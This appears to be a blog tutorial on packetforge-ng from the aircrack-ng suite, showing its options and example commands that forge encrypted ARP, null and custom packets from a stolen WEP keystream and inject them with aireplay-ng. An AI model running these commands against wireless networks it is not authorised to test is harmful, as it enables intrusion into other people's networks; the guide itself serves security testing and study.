Forging ARP, UDP, ICMP or custom packets with packetforge-ng

The purpose of packetforge-ng is to create encrypted packets that can subsequently be used for injection. You may create various types of packets such as arp requests, UDP, ICMP and custom packets. The most common use is to create ARP requests for subsequent injection.

To create an encrypted packet, you must have a PRGA (pseudo random genration algorithm) file. This is used to encrypt the packet you create. This is typically obtained from aireplay-ng chopchop or fragmentation attacks.

Forging ARP, UDP, ICMP or custom packets with packetforge-ng

root@kali:~# packetforge-ng --help

Packetforge-ng 1.2 rc4 - (C) 2006-2015 Thomas d'Otreppe
Original work: Martin Beck
http://www.aircrack-ng.org

Usage: packetforge-ng <mode> <options>

Forge options:

-p <fctrl>     : set frame control word (hex)
-a <bssid>     : set Access Point MAC address
-c <dmac>      : set Destination  MAC address
-h <smac>      : set Source       MAC address
-j             : set FromDS bit
-o             : clear ToDS bit
-e             : disables WEP encryption
-k <ip[:port]> : set Destination IP [Port]
-l <ip[:port]> : set Source      IP [Port]
-t ttl         : set Time To Live
-w <file>      : write packet to this pcap file
-s <size>      : specify size of null packet
-n <packets>   : set number of packets to generate

Source options:

-r <file>      : read packet from this raw file
-y <file>      : read PRGA from this file

Modes:

--arp          : forge an ARP packet    (-0)
--udp          : forge an UDP packet    (-1)
--icmp         : forge an ICMP packet   (-2)
--null         : build a null packet    (-3)
--custom       : build a custom packet  (-9)

--help         : Displays this usage screen

Usage Example

Generating an arp request packet

Here is an example of how to generate an arp request packet.

First, obtain a xor file (PRGA) with either the aireplay-ng chopchop or fragmentation method.

Then use the following command:

packetforge-ng -0 -a 00:14:6C:7E:40:80 -h 00:0F:B5:AB:CB:9D -k 192.168.1.100 -l 192.168.1.1 -y fragment-0124-161129.xor -w arp-request

Where:

  • -0 indicates you want a arp request packet generated
  • -a 00:14:6C:7E:40:80 is the Access Point MAC address
  • -h 00:0F:B5:AB:CB:9D is the source MAC address you wish to use
  • -k 192.168.1.100 is the destination IP. IE In an arp it is the “Who has this IP”
  • -l 192.168.1.1 is the source IP. IE In an arp it is the “Tell this IP”
  • -y fragment-0124-161129.xor
  • -w arp-packet

Assuming you are experimenting with your own access point, arp request packet generated above can be decrypted with your own key. So to see that packet we just created can be decrypted:

Enter airdecap-ng -w <access point encryption key> arp-request

The results look like this:

Total number of packets read             1
Total number of WEP data packets         1
Total number of WPA data packets         0
Number of plaintext data packets         0
Number of decrypted WEP  packets         1
Number of decrypted WPA  packets         0

To view the packet that was just decrypted, enter tcpdump -n -vvv -e -s0 -r arp-request-dec.

The results look like this:

reading from file arp-request-dec, link-type EN10MB (Ethernet)
18:09:27.743303 00:0f:b5:ab:cb:9d > Broadcast, ethertype ARP (0x0806), length 42: arp who-has 192.168.1.100 tell 192.168.1.1

Which is exactly what we expected. Now you can inject this arp request packet as follows aireplay-ng -2 -r arp-request ath0.

The program will respond as follows:

      Size: 68, FromDS: 0, ToDS: 1 (WEP)

           BSSID  =  00:14:6C:7E:40:80
       Dest. MAC  =  FF:FF:FF:FF:FF:FF
      Source MAC  =  00:0F:B5:AB:CB:9D

      0x0000:  0841 0201 0014 6c7e 4080 000f b5ab cb9d  .A....l~@.......
      0x0010:  ffff ffff ffff 8001 6c48 0000 0999 881a  ........lH......
      0x0020:  49fc 21ff 781a dc42 2f96 8fcc 9430 144d  I.!.x..B/....0.M
      0x0030:  3ab2 cff5 d4d1 6743 8056 24ec 9192 c1e1  :.....gC.V$.....
      0x0040:  d64f b709                                .O..

Use this packet ? y

Saving chosen packet in replay_src-0124-163529.cap
You should also start airodump-ng to capture replies.
End of file.

By entering “y” above, the packet you created with packetforge-ng is then injected.

Generating a null packet

This option allows you to generate LLC null packets. These are the smallest possible packets and contain no data. The switch “-s” is used to manually set the size of the packet. This a simple way to generate small packets for injection.

Remember that the size value (-s) defines the absolute size of an unencrypted packet, so you need to add 8 bytes to get its final length after encrypting it (4 bytes for iv+idx and 4 bytes for icv). This value also includes the 802.11 header with a length of 24bytes.

The command is:

 packetforge-ng --null -s 42 -a BSSID -h SMAC -w short-packet.cap -y fragment.xor

Where:

  • –null means generate a LLC null packet (requires double dash).
  • -s 42 specifies the packet length to be generated.
  • -a BSSID is the MAC address of the access point.
  • -h SMAC is the source MAC address of the packet to be generated.
  • -w short-packet.cap is the name of the output file.
  • -y fragment.xor is the name of the file containing the PRGA.

Generating a custom packet

If you want to generate a customer packet, first create a packet with the tool of your choice. This could be a specialized tool, a hex editor or even from a previous capture. Then save it as a pcap file. Following this, run the command:

 packetforge-ng -9 -r input.cap -y keystream.xor -w output.cap

Where:

  • -9 means generate a custom packet.
  • -r input.cap is the input file.
  • -y keystream.xor is the file containing the PRGA.
  • -w output.cap is the output file.

When it runs, packetforge-ng will ask you which packet to use and then output the file.

Usage Tips

Most access points really don’t care what IPs are used for the arp request. So as a result you can use 255.255.255.255 for source and destination IPs.

So the packetforge-ng command becomes:

 packetforge-ng -0 -a 00:14:6C:7E:40:80 -h 00:0F:B5:AB:CB:9D -k 255.255.255.255 -l 255.255.255.255 -y fragment-0124-161129.xor -w arp-request

Usage Troubleshooting

Including both -j and -o flags

A common mistake people make is to include either or both -j and -o flags and create invalid packets. These flags adjust the FromDS and ToDS flages in the packet generated. Unless you are doing something special and really know what you are doing, don’t use them. In general, they are not needed.

Error message “Mode already specified”

This is commonly caused by using the number one (-1) instead of dash lowercase L (-l) in the command.

Entering:

 packetforge-ng -0 -a 00:14:6C:7E:40:80 -h 00:09:5B:EC:EE:F2 -k 255.255.255.255 -1 255.255.255.255 -y 00:14:6C:7E:40:80-03-00-14-6C-7E-40-80.xor -w arp-request

Gives:

 Mode already specified.
 "packetforge-ng --help" for help.

This because -1 (number one) was used instead of the correct -l (the letter ell). So simply use “-l”.

Source:

Author: Thomas d’Otreppe, Original work: Christophe Devine

License: GPLv2

Check Also

Enabling AMD GPU for Hashcat on Kali Linux: A Quick Guide

Enabling AMD GPU for Hashcat on Kali Linux: A Quick Guide

If you’ve encountered an issue where Hashcat initially only recognizes your CPU and not the …

Identifying harmful activity on your captured traffic

This Python script utilises Wireshark or TCPdump to analyse network traffic stored in a specified …

Leave your solution or comment to help others.

This site uses Akismet to reduce spam. Learn how your comment data is processed.

Discover more from blackMORE Ops

Subscribe now to keep reading and get access to the full archive.

Continue reading

Privacy Policy on Cookies Usage

Some services used in this site uses cookies to tailor user experience or to show ads.